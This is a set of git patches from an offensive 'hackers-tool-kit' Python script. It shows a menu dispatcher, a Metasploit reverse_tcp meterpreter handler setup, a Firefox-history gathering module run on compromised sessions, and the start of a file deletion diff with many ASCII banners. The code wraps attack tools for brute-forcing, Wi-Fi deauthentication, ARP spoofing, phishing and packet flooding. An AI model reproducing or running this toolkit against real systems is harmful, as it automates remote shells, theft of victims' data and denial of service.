yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + +#COMPILE C START# +#---------------# +def compilec(): + print "filename / filepath" + r = raw_input("> ") + print "\nfilename2 / filepath2" + h = raw_input("> ") + + a = 'g++ {0} -o {1}'.format(r,h) + os.system(a) +#COMPILE C END# +#-------------# + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + if x == "compilec": + compilec() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From cba1799be25d411a90dfbddc6c07506aae0ebbbd Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 28 Jun 2019 04:51:32 +0100 Subject: [PATCH 176/214] Update README.md --- README.md | 9 --------- 1 file changed, 9 deletions(-) diff --git a/README.md b/README.md index 6fae203..96ff396 100644 --- a/README.md +++ b/README.md @@ -48,13 +48,4 @@ the htksecure.py file will run the hackers-tool-kit with proxychains and other t this is where i will try to put the most recent updates - -* added a update file - -* added python and php payload maker - -* added a foxhis option (firefox history gather) - -* added the RED_HAWK tool (rhawk option) - * added a option to compile c files (compilec option) From 4a258f4e5dd5ddc238997e189fd7e90fea767ce3 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 30 Jun 2019 04:39:48 +0000 Subject: [PATCH 177/214] Delete htk.py --- htk.py | 3228 -------------------------------------------------------- 1 file changed, 3228 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index b9012ad..0000000 --- a/htk.py +++ /dev/null @@ -1,3228 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ 